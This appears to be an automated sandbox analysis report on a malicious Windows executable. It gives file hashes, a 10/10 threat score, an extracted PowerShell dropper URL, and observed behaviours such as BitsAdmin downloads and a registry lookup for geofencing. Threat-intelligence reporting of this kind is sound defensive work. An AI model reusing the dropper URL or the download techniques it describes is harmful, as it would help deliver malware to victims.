General

  • Target

    146fb98d6e239d844dee837aa55ff873d0599d2af7400a1b6fba74ee0eb5c7c3.exe

  • Size

    301KB

  • Sample

    240821-lrj2lavglp

  • MD5

    bbbd7535034d9bb440dd2b71c724b1e9

  • SHA1

    3cac48e520e29055e37e32823e8e8c1db8c7da4d

  • SHA256

    146fb98d6e239d844dee837aa55ff873d0599d2af7400a1b6fba74ee0eb5c7c3

  • SHA512

    f05c6f43182dcd9221dba3bed02214ada5092abbe6a725e8e6cdb092dd587e058c8f69ecd79d5bcc93ae631e9451d2b3a6b4f99f820763aa148c56fa40a32960

  • SSDEEP

    6144:ctL5/GB1/J3Vyg7EzpZVo7hvnZUKWuP2PuSKk/Iu3+EHx:q/u58nzpZW7ncurSKkAu9Hx

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://chocolatey.org/7za.exe

Extracted

Language
ps1
Source
URLs
exe.dropper

https://chocolatey.org/7za.exe

Targets

    • Target

      146fb98d6e239d844dee837aa55ff873d0599d2af7400a1b6fba74ee0eb5c7c3.exe

    • Size

      301KB

    • MD5

      bbbd7535034d9bb440dd2b71c724b1e9

    • SHA1

      3cac48e520e29055e37e32823e8e8c1db8c7da4d

    • SHA256

      146fb98d6e239d844dee837aa55ff873d0599d2af7400a1b6fba74ee0eb5c7c3

    • SHA512

      f05c6f43182dcd9221dba3bed02214ada5092abbe6a725e8e6cdb092dd587e058c8f69ecd79d5bcc93ae631e9451d2b3a6b4f99f820763aa148c56fa40a32960

    • SSDEEP

      6144:ctL5/GB1/J3Vyg7EzpZVo7hvnZUKWuP2PuSKk/Iu3+EHx:q/u58nzpZW7ncurSKkAu9Hx

    Score
    10/10
    • Blocklisted process makes network request

    • Download via BitsAdmin

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

MITRE ATT&CK Enterprise v15

Tasks